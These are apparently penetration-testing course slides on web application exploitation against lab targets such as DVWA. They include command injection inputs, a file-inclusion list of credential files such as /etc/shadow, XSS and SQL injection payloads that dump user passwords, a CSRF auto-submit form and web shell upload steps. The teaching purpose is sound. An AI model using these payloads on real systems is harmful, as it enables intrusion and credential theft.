Professional Documents
Culture Documents
C3SA_Module_03_V1
C3SA_Module_03_V1
WEB APPLICATION
EXPLOITATION
Internet Workflow
Web Application Working
Content Management Systems
➤ It offers a flexible, back-end interface for users to edit, modify, and publish
content on a website.
➤ Outdated version
➤ Inexperienced Administrators
➤ Malicious Plugins
➤ Phishing Attempts
https://github.com/vavkamil/dvwp
https://www.wordfence.com/blog/2018/12/wordpress-botnet-attacking-wordpress/
Custom Code (from scratch)
➤ The main aim is to identify the attack vectors that can be leveraged
externally
Web Application
Public Users
Attack Point
Privileged Users
External-facing • Purpose
• Implementation
Attack Point • Design
Internal-facing
• Technology
➤ Points worth investing time at :
■ Login/Logout Fields
■ Admin Spaces
■ Logic Workflow
management etc
➤ Validate the findings:
workflow
File Upload
Directory Server-side SQL Injection Information
Traversal Request Forgery Disclosure
(SSRF)
Command Client-Side Vulnerabilities
Injection
Clickjacking
Cross-side Cross-Origin
Request Forgery Resource Sharing
(CSRF) (CORS)
Cross-site Scripting
(XSS)
Understanding the Request-Response Model
■ Burpsuite
■ Foxy-Proxy
Introduction to Burpsuite
➤ When we type the URL in our browser and hit enter in order to see the web
page our browser makes a HTTP Request.
➤ PUT: PUT method is used when user want to replace whatever currently
exists at the target URL with something else.
HTTP Request Method
➤ HEAD: HEAD method is identical to GET method but the HEAD Method is
made only to retrieve only HEAD without the Body in the response.
Quick Tip: We can use CURL command with the option to perform a ‘OPTION’
method which can provide all the methods that are allowed on a specific
resource.
➤ The Host request header specifies the domain name of the server and
the TCP port number on which the server is listening.
➤ If the Request is made to the web server with the HTTPS protocol the
default Syntax is used.
➤ The Accept request HTTP header advertises which content types, expressed
as MIME types, the client is able to understand. (By Client we mean
Browser)
➤ For Instance our browser (client) can understand: en-US (US english)
HTTP Accept Encoding Header
➤ In order to send large data over the HTTP protocol the data is encoded. The
Browser or the client specifies the encoding algorithm that are accepted.
➤ The Cookie HTTP request header contains stored HTTP cookies previously
sent by the server with the Set-Cookie header.
➤ This sent by the browser which contains the cookie sent by the server.
➤ There are many HTTP Request Header which can be used to send a HTTP
Request to the Server.
➤ A typical HTTP Response Headers looks like the headers shown in the
below figure.
HTTP Response Code
➤ Server replies with a response code which informs the browser that what
type of response is sent by the Server.
FoxyProxy: Proxy Management tool
➤ We just need to go to the options bar and click it and we will be greeted
with the options to configure FoxyProxy.
Adding a proxy configuration in FoxyProxy
➤ We need to provide all the options that required to configure and add proxy.
And we are done we just need to Switch on the Proxy
Lab Setup
➤ Make sure that the metasploitable VM is ready & accessible from Parrot
Machine.
➤ To control the website or web application code that allows the attacker to
gain some level of control of the site is referred to the term “Web
Exploitation”.
➤ Web pentesting can be done through automated scanners and manully &
both have it’s own pros and cons, we will figure that out in a moment.
➤ The server which hosts the website is called web server and typically
listens on TCP port 80. In some cases, the service could be configured to
run on ports other than the default one, as a small step towards security.
➤ The client via browser, connects to the port and hence they can
communicate or transfer data between each other.
➤ One can find the vulnerable CMS version using query and then can search
for any public available websites.
➤ The following vulnerabilities will be covered in the next slides: -
■ Cross Site Scripting
■ SQL Injection
■ Code Injection vulnerability
■ File inclusion
■ Bruteforce website parameters/fields
■ File Upload vulnerability
➤ All the above mentioned vulnerabilities are of high severity and reputed
companies like facebook, google etc. provide bounties when disclosed to
them.
➤ Code Injection Vulnerability: -
It generally occurs when there is an input parameter field at a website. The goal
is to execution of arbitrary commands on the host operating system via a
vulnerable application. It must be noted that it is possible when an application
passes unsafe user supplied data to a system shell.
■ It can be used to compromise other parts of the network and then pivot to
other systems within the organizations.
■ It can lead to full takeover of the web server running the website.
Source: https://portswigger.net
Demo
Server vulnerable to
Attacker Machine command execution
IP: 192.168.100.140 IP: 192.168.100.141
➤ There is a ping utility which takes an IP address as an input and check
whether it is alive or not.
➤ As you might have stumbled upon that this utility is written in PHP (a
popular server language). Let’s check the source code of the handling PHP
code.
➤ Code starts with checking the input given to the field in form of IP address
& the OS running in the server side.
➤ The ping command runs 3 times which means that the backend OS is not
Windows OS, it might be any Linux server.
➤ Now, try to execute any other command while giving IP address as an
input & there are 2 ways to execute simultaneous command at a time.
Example: -
ls; whoami
ls | whoami
➤ The first command will execute both commands and the second one only
the last command.
➤ Case 1: - <IP address> ; Injection_command
➤ The command injection works and our command is executed at the web
server.
➤ Case 2: <IP address> | Injection_command
➤ Only the backend command is executed in this case, hence one can also
establish a communication channel or deliver payloads directly to the web
server because of this vulnerability.
➤ File Inclusion Vulnerability: -
This is because of misconfiguration of the developer writing the
application to inclusion of a file. The local files of the systems according to
the Operating System can be included directly from the web application
leading to sensitive information disclosure.
Source: https://portswigger.net
➤ Here is the list of some of the important files to look for once the
vulnerabilities are identified.
➤ Payload list if the target server is Windows: -
c:/boot.ini
c:/inetpub/logs/logfiles
c:/inetpub/wwwroot/global.asa
c:/inetpub/wwwroot/index.asp
c:/inetpub/wwwroot/web.config
c:/sysprep/sysprep.inf
c:/sysprep/sysprep.xml
c:/system32/inetsrv/metabase.xml
/etc/issue
/etc/passwd
/etc/shadow
/etc/group
/etc/hosts
/etc/motd
/etc/mysql/my.cnf
/proc/mounts
/proc/net/arp
/proc/net/route
/proc/net/tcp
/proc/net/udp
Server vulnerable to
Attacker Machine Directory Traversal
IP: 192.168.100.140 IP: 192.168.100.141
➤ Head straight to the following URL: -
■ Social networking websites like Facebook, Twitter & Instagram allow users to
upload images and videos.
■ In case of improper validation of files, the attacker can upload malicious files to
the server which can lead to full compromise and access to sensitive
information present in the server.
➤ Generally, web shells are uploaded to the server ends.
➤ The web shells are program that allows an attacker to perform various
malicious operations such as running shell commands, creating files,
deleting files, downloading sensitive files etc.
➤ Let’s try to bypass it with any other extension, the code to upload the file is
written in PHP, it also tells the path in which file should be uploaded.
Note: Disclosure of any server directory to the end user can pose huge risk .
➤ The PHP code which upload the file to the server has a misconfiguration
as the file type is not checked anywhere.
➤ Once the payload is generated and saved in a PHP file, start a listener on
metasploit.
➤ Start the listener on port 443, this must be the same during payload
generation.
➤ Upload the malicious PHP payload to the server.
➤ The path with the exact file name is also disclosed at the portal, now once
uploaded our shell is just one click far away.
■ In Addition, the attacker can send input (e.g., username, password, session ID,
etc) which can be later captured by an external script.
➤ The victim's browser has no way to know that the script should not be
trusted, and will execute the script. Because it thinks the script came from
a trusted source, the malicious script can access any cookies, session
tokens, or other sensitive information retained by the browser and used
with that site.
➤ We will study Reflected & Stored XSS in the course, DOM based XSS is out
of scope.
https://insecure-site.com/status?message=<script>/*+Bad+stuff+here+*/
</script>
➤ This can have disastrous consequences as this crafted link can be sent to
the victim and attacker can execute it’s own Java Script targeting the
user.
<p>Status: <script>/* Bad stuff here */</script></p>
Demo – Reflected XSS
➤ When the input parameter is tested with an input data, we get the
following result: -
➤ Means output is reflected & the application do not perform any other
processing of data. The parameter is also identified by looking at the URL: -
➤ Let’s try to control the application flow using some Java Script code, which
simply pop/alert in a given user reference. Ex: <script>alert(1)</script>
➤ Every time the infected page is visited, the malicious script injected by
the attacker is transmitted to the victim browser.
➤ Let’s now have a look at the lab setup for this case scenario: -
➤ There are two input parameters ‘Name’ & ‘Message’ in the webpage
affected with stored XSS.
➤ After checking for input data reflection, it is seen that both ‘Name’ &
‘Message’ parameter are reflected, however there is a limit set for
‘Name’ parameter.
➤ Let’s try to inject our malicious payload to test XSS in the ‘Message’ field.
➤ Now if we input the ‘Name’ & send the information, the value of ‘Message’
box will reflect & we can see that our injected payload will work.
➤ The interesting thing here is that if you try to browse any other page and
then return to the stored XSS vulnerable page, you will get your malicious
code running.
➤ This happens each & every time the victim visits the vulnerable page.
➤ This will stop when the user session ID expires & he need to re-enter the
input.
➤ SQL Injection: -
SQL injection is a web security vulnerability that allows an attacker to
interfere/manipulate with the queries that an application makes to its
database. Basically it is a code injection technique that exploits a security
vulnerability in an application's software.
Reference: portswigger.net
➤ Basically, this happens because of improper input validation in the user end.
➤ There might be some kind of logical error that the attacker exploit to retrieve
sensitive information from the database.
➤ Let’s learn some of the basic SQL commands to get started with exploiting SQL
server.
➤ SQL command basics: -
➤ Let’s enter ‘1’ as input to the given field and check the response. Also, it
must be noted that the application uses SQL query to connect to the
backend database.
➤ Try to find out all the USER ID’s available in the database.
➤ After, entering number 1 to 5 as input in the field the following
information is displayed by the server.
➤ Let’s try to test any SQLi possibilities with Always True scenario, use the
following payload: -
$’ or ‘1’=‘1
➤ The output is the list of all available username associated with the user ID.
➤ It can be seen that there are total of 5 entries in the database.
➤ Now, to identify the database & it’s version running at backend, the error
shows that the backend database is SQL
➤ We will use the ‘union’ query to execute more than 2 statements at same
time.
6767’ or 5=1 union select null, version()#
➤ 6767 is a random input type & ‘ [single quote] is for termination of first
query.
➤ null is just a placeholder because the 1st query has 2 fields labelled
First_Name & surname. We have 2 positions to fill but we need only 1.
Hence, null is placed.
➤ The user context with which the service is running can also be identified.
➤ The SQL service at the server is running as root (high privileged user).
➤ We will try to identify the database name using the database() function.
The whole query would be the same & we need to add the above function
to it.
6767’ or 5=1 union select null, database()#
➤ ‘dvwa’ is the name of the database which is connected to the vulnerable
application.
➤ Let’s now enumerate the tables that this database contain. The
information_schema.tables is a mysql table that contains list of tables
in a database.
➤ The table_name returns the names of tables in the database.
➤ Let’s alter our query which will include all the tables from the identified
database.
6767’ or 5=1 union select null, concat(user, 0x0a, password) FROM users#
➤ Information Disclosure
It is type of information leakage, when a website exposes sensitive
information to the end users un-intentionally.
■ Any critical information like PII, patient records, business information etc
Information
Disclosure
➤ Cross Site Request Forgery
■ Based on identification of the induced flow, attacker craft special request &
somehow induce users to click on the link.
■ Applications have session cookies to identify the user requests. However, the
tracking of user session remains unmanaged.
<CAPTURED REQUEST>
POST /email/change HTTP/1.1
Host: vulnerable-app.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 25
Cookie: session=aksgdg7ewgfkljaslkgfpiwept
email=master@admin-user.com
<HTML CODE>
<html>
<body>
<form action="https://vulnerable-app.com/email/change"
method="POST">
<input type="hidden" name="email"
value=”fake_user@xyz.net" />
</form>
<script> document.forms[0].submit();</script>
</body>
</html>
Hands-on
Demonstration
CSRF
➤ Misconfigured Cross Origin Resource Sharing
■ Attackers can validate this using a simple header injection & access
sensitive information presented to whitelisted domains by the website.
GET /sensitive-victim-data HTTP/1.1
Host: vulnerable-app.com
Origin: https://malicious-site.com
Cookie: sessionid=...
HTTP/1.1 200 OK
Access-Control-Allow-Origin:
https://malicious-site.com
Access-Control-Allow-Credentials: true ...
➤ In the above example, the above response header states that access is
allowed from the attacker-controlled domain
➤ Also, the attacker can steal the sensitive information as the CORS setup is
mis-configured
CORS
➤ Click Jacking
■ Attackers will re-direct you to a website in which they will get financial gain,
sensitive information etc
■ The websites are crafted very well in such a manner it is difficult to identify the
legit one
Hands-on
Demonstration
Demonstration of IDN
Homograph Attack
Module 3 : Capstone Project
➤ Download DVWA locally in VM & exploit all the OWASP top 10 vulns
➤ Try & Document exploitation of Code Injection in DVWA with easy to Hard
level expertise. Share it in PDF format.
➤ Use “httpx” to check for top 1000 port across all the subdomains &
submit it as a list in excel file.
Thank You
For Professional Red Team / Blue Team / Purple Team,
Cloud Cyber Range labs / Courses / Trainings, please contact
info@cyberwarfare.live